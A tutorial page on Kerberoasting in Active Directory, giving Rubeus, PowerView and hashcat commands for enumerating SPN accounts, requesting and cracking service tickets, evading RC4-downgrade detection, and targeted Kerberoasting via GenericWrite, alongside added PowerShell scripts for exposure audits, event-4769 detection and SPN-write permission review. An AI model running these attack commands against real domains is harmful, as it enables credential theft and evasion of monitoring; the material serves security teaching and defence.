# Kerberoasting
In an Active Directory environment, every service that requires Kerberos authentication registers a Service Principal Name (SPN). This allows clients to request tickets for that service. When a client requests access to a service, it receives a Ticket Granting Service (TGS) ticket, which is encrypted with a key derived from the service account's password (for RC4-HMAC, the account's NT hash).

This mechanism can be exploited by:

1. Identifying service accounts with registered SPNs.
2. Requesting a TGS ticket for the identified service using any compromised user account.
3. Cracking the TGS ticket offline to recover the service account's password.
Since service account passwords are rarely changed, Kerberoasting has become a widely used attack technique.
## Identify service accounts with registered SPNs

```powershell
Get-DomainUser -SPN
```

```powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
```
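From the defender's side, the same enumeration is the starting point of an exposure audit: which SPN-bearing accounts would actually yield a crackable ticket, and why. The script below is an added example, not part of the original page or of any tool it mentions. The classifier runs on plain objects, so it can be tried on the constructed sample at the end without a domain; the commented live line assumes the RSAT `ActiveDirectory` module. The 180-day threshold is an assumed policy value.

```powershell
# Added example (not from the original page): rate SPN-bearing accounts by Kerberoasting exposure.

# Bits of msDS-SupportedEncryptionTypes: 0x4 = RC4-HMAC, 0x8 = AES128-CTS, 0x10 = AES256-CTS.
$RC4Bit  = 0x4
$AesBits = 0x8 -bor 0x10

function Get-KerberoastExposure {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $Account,
        [int]$MaxPasswordAgeDays = 180        # assumed local policy; adjust to yours
    )
    process {
        # Machine accounts and krbtgt rotate long random passwords; they are not practical targets.
        if ($Account.ObjectClass -eq 'computer' -or $Account.SamAccountName -eq 'krbtgt') { return }
        $spns = @($Account.ServicePrincipalName | Where-Object { $_ })
        if ($spns.Count -eq 0) { return }

        $enc      = [int]$Account.'msDS-SupportedEncryptionTypes'
        $findings = New-Object 'System.Collections.Generic.List[string]'

        # 0/unset advertises no AES, so the KDC issues RC4 tickets for this account and the
        # requester needs no downgrade (the evasion the page describes). Always parenthesise
        # -band before -eq: bitwise operators bind looser than comparisons in PowerShell.
        $rc4Only    = (($enc -band $AesBits) -eq 0)
        $rc4Allowed = (-not $rc4Only) -and (($enc -band $RC4Bit) -ne 0)
        if ($rc4Only)        { $findings.Add('RC4-only: no AES advertised, no downgrade needed') }
        elseif ($rc4Allowed) { $findings.Add('RC4 still allowed alongside AES') }

        $ageDays = $null; $stale = $false
        if ($null -ne $Account.PasswordLastSet) {
            $ageDays = [int]((Get-Date) - [datetime]$Account.PasswordLastSet).TotalDays
            $stale   = $ageDays -gt $MaxPasswordAgeDays
            if ($stale) { $findings.Add("Password unchanged for $ageDays days") }
        } else { $findings.Add('PasswordLastSet unknown') }

        $priv = ([int]$Account.AdminCount -eq 1)
        if ($priv) { $findings.Add('Privileged (adminCount=1): a cracked password is an admin password') }

        $risk = if ($priv -or ($rc4Only -and $stale)) { 'High' }
                elseif ($rc4Only -or $rc4Allowed -or $stale) { 'Medium' }
                else { 'Low' }

        # Remediation hints: AES-only encryption types (0x18) and a password the cracker cannot reach.
        $fix = @()
        if ($rc4Only -or $rc4Allowed) { $fix += 'set msDS-SupportedEncryptionTypes to 0x18 (AES only) once clients support AES, then reset the password so AES keys exist' }
        if ($stale -or $null -eq $ageDays) { $fix += 'rotate to a long random password or migrate the service to a gMSA' }

        [pscustomobject]@{
            SamAccountName  = $Account.SamAccountName
            Enabled         = $Account.Enabled
            SPNs            = $spns -join '; '
            EncTypes        = ('0x{0:x}' -f $enc)
            PasswordAgeDays = $ageDays
            Risk            = $risk
            Findings        = $findings -join '; '
            Fix             = $fix -join '; '
        }
    }
}

# Live use (needs the RSAT ActiveDirectory module and domain connectivity):
# Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName,msDS-SupportedEncryptionTypes,PasswordLastSet,AdminCount,Enabled |
#     Get-KerberoastExposure | Sort-Object Risk | Format-Table -AutoSize

# Constructed sample account (not from a real domain): SPN set, no AES advertised, old password, privileged.
$sample = [pscustomobject]@{
    SamAccountName                  = 'svc_sql'
    ObjectClass                     = 'user'
    Enabled                         = $true
    AdminCount                      = 1
    ServicePrincipalName            = @('MSSQLSvc/db01.example.com:1433')
    'msDS-SupportedEncryptionTypes' = 0
    PasswordLastSet                 = (Get-Date).AddDays(-900)
}
$sample | Get-KerberoastExposure | Format-List
```

The sample comes out as `Risk: High` with all three findings. The `Fix` column is the order in which the exposure actually shrinks: a gMSA removes the human-chosen password entirely, AES-only removes the fast RC4 cracking path, and either one alone already defeats the typical rockyou run shown later on this page.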
## Request a TGS ticket

Use the tool Rubeus to request a TGS ticket for the identified service account.

```powershell
Rubeus.exe kerberoast /user:serviceaccount
```

Kerberoast all possible accounts:

```powershell
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
```
Security tools like Microsoft Defender for Identity (MDI) can detect Kerberos encryption downgrade attacks, where an attacker forces Kerberos to use weaker encryption (for example RC4-HMAC, encryption type 0x17). To evade such detections, attackers can target Kerberoastable accounts that natively support only RC4-HMAC, eliminating the need for an explicit downgrade.

```powershell
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec
```
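The evasion above only sidesteps downgrade-based detection: the domain controller still logs every issued service ticket as Security event 4769, and an RC4 ticket for a user-object SPN looks the same whether or not a downgrade happened. The script below is an added example, not part of the page or of MDI; it classifies 4769 fields and then looks for the Kerberoast signature (one requester, many distinct services in a short window). It assumes the "Audit Kerberos Service Ticket Operations" subcategory is enabled on the DC and that the script runs there (or with `-ComputerName`); the five-service threshold is an assumption. The constructed sample at the end runs offline.

```powershell
# Added example (not from the original page): flag Kerberoast-style TGS requests in event 4769.

function ConvertFrom-EventData {
    param([Parameter(Mandatory)] $Event)
    # Read EventData by field name; positional Properties[] indices vary between OS builds.
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

function Test-KerberoastRequest {
    param([Parameter(Mandatory)] [hashtable]$Data)
    # Tickets for machine accounts (name ends in $) and the krbtgt TGT are routine noise.
    $svc = $Data.ServiceName
    if (-not $svc -or $svc.EndsWith('$') -or $svc -eq 'krbtgt') { return $null }
    # Only issued tickets (Status 0x0) can be taken offline and cracked.
    if ($Data.Status -ne '0x0') { return $null }
    # 0x17 = RC4-HMAC. AES tickets (0x11 / 0x12) are not flagged here; their keys are far slower to brute-force.
    if ($Data.TicketEncryptionType -ne '0x17') { return $null }
    [pscustomobject]@{
        Requester = $Data.TargetUserName      # account that asked for the ticket (user@REALM)
        Service   = $svc
        ClientIp  = $Data.IpAddress
        EncType   = $Data.TicketEncryptionType
        Reason    = 'RC4 service ticket for a user-object SPN'
    }
}

function Find-KerberoastActivity {
    param([datetime]$Since = (Get-Date).AddHours(-24), [int]$MinDistinctServices = 5)
    $hits = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object { Test-KerberoastRequest (ConvertFrom-EventData $_) } |
        Where-Object { $_ }
    # A single RC4 ticket can be legitimate legacy traffic; one requester collecting tickets for
    # many different services is the pattern that "kerberoast" (no /user) produces.
    $hits | Group-Object Requester |
        Where-Object { @($_.Group.Service | Sort-Object -Unique).Count -ge $MinDistinctServices } |
        Select-Object @{ n = 'Requester';        e = { $_.Name } },
                      @{ n = 'DistinctServices'; e = { @($_.Group.Service | Sort-Object -Unique).Count } },
                      @{ n = 'ClientIps';        e = { @($_.Group.ClientIp | Sort-Object -Unique) -join ',' } }
}

# Constructed sample fields (not a real log): an ordinary user obtaining an RC4 ticket for a user SPN.
$sample = @{
    TargetUserName       = 'alice@EXAMPLE.COM'
    ServiceName          = 'svc_sql'
    IpAddress            = '::ffff:10.0.0.25'
    TicketEncryptionType = '0x17'
    TicketOptions        = '0x40810000'
    Status               = '0x0'
}
Test-KerberoastRequest $sample | Format-List
```

Run `Find-KerberoastActivity` on a domain controller to get the grouped view; the per-event `Test-KerberoastRequest` is what you would port into a SIEM rule. The `/user:` variant shown above produces a single hit rather than a burst, which is why the account-side audit (AES-only encryption types) matters as much as the log-side rule.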
## Cracking the TGS ticket

The ticket can then be cracked using a tool like hashcat:

```bash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
```
## Targeted Kerberoasting

When you have `GenericAll` privileges over a user account, one obvious option is to reset the user's password. However, obtaining the original password hash can be more valuable, especially for lateral movement. This is where Targeted Kerberoasting comes into play. Additionally, it avoids disrupting the user's access by not resetting their password.

With `GenericAll` or `GenericWrite` permissions, you can modify the `servicePrincipalName` (SPN) attribute of the target user. The SPN can be set to any unique value within the domain. Once the SPN is updated, you can request a Ticket Granting Service (TGS) ticket for that user using the newly assigned SPN. Since the TGS ticket is encrypted with the user's password hash, it becomes vulnerable to Kerberoasting.
Check if the target user already has an SPN assigned:

```powershell
Get-DomainUser -Identity <username> | select serviceprincipalname
```

```powershell
Get-ADUser -Identity <username> -Properties ServicePrincipalName | select ServicePrincipalName
```
If the target user has no SPN set, you can set one yourself:

```powershell
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='sqlservice/db.example.com'}
```

```powershell
Set-ADUser -Identity <username> -ServicePrincipalNames @{Add='sqlservice/db.example.com'}
```
With the SPN set, request a TGS ticket for the target user using a tool like Rubeus. The `/outfile` flag allows you to save the ticket's encrypted hash to a file.

```powershell
Rubeus.exe kerberoast /outfile:targetedhashes.txt /user:<username>
```
Finally, the TGS ticket can be cracked to recover the password.
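The precondition for this whole section is that some principal other than the expected administrators can write `servicePrincipalName` on a user object. The script below is an added example, not part of the page or of PowerView/RSAT; it audits the DACL of user objects for exactly those rights. `Test-SpnWriteAce` runs on plain objects (see the constructed ACE at the end), while `Get-SpnWriters` assumes the RSAT `ActiveDirectory` module and its `AD:` drive. The list of expected principals is an assumption to adjust per domain.

```powershell
# Added example (not from the original page): find who can add an SPN to a user object.

# schemaIDGUID of the servicePrincipalName attribute; attribute-scoped WriteProperty ACEs carry it in ObjectType.
$SpnAttributeGuid = [guid]'f3a64788-5306-11d1-a9c5-0000f80367c1'

function Test-SpnWriteAce {
    param([Parameter(Mandatory)] $Ace)
    if ([string]$Ace.AccessControlType -ne 'Allow') { return $false }
    $rights = [string]$Ace.ActiveDirectoryRights
    # GenericAll/GenericWrite write the attribute directly; WriteDacl/WriteOwner let the holder grant themselves that.
    if ($rights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner') { return $true }
    # WriteProperty matters only when unscoped (all attributes) or scoped to servicePrincipalName itself.
    if ($rights -match 'WriteProperty') {
        $scope = [guid]$Ace.ObjectType
        return ($scope -eq [guid]::Empty) -or ($scope -eq $SpnAttributeGuid)
    }
    return $false
}

function Get-SpnWriters {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [string]$DistinguishedName,
        # Principals expected to hold these rights (assumed list); everything else is reported for review.
        [string[]]$ExpectedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT AUTHORITY\SELF')
    )
    process {
        # Get-Acl on the AD: drive returns the object's DACL including inherited ACEs,
        # so rights delegated at an OU show up here too (Inherited = True).
        $acl = Get-Acl -Path ("AD:\" + $DistinguishedName)
        foreach ($ace in $acl.Access) {
            if (-not (Test-SpnWriteAce $ace)) { continue }
            $who = $ace.IdentityReference.Value
            if ($ExpectedPrincipals -contains $who -or $who -match '\\(Domain|Enterprise) Admins$') { continue }
            [pscustomobject]@{
                Target    = $DistinguishedName
                Principal = $who
                Rights    = [string]$ace.ActiveDirectoryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Live use (needs the RSAT ActiveDirectory module; OU path is a placeholder):
# Import-Module ActiveDirectory
# (Get-ADUser -Filter * -SearchBase 'OU=Users,DC=example,DC=com').DistinguishedName | Get-SpnWriters | Format-Table -AutoSize

# Constructed ACE (not from a real domain): a helpdesk group holding GenericWrite on a user.
$ace = [pscustomobject]@{
    AccessControlType     = 'Allow'
    ActiveDirectoryRights = 'GenericWrite'
    ObjectType            = [guid]::Empty
    IdentityReference     = [pscustomobject]@{ Value = 'EXAMPLE\Helpdesk' }
    IsInherited           = $false
}
Test-SpnWriteAce $ace    # True: EXAMPLE\Helpdesk could set an SPN on this user and Kerberoast it
```

Each row this produces is a delegation to review: either the grant is intentional (then the target account belongs in the exposure audit above, because its password is only as safe as the weakest member of that group) or it is leftover delegation that should be removed. Pair the audit with Security event 5136 on `servicePrincipalName` changes to catch a write when it actually happens.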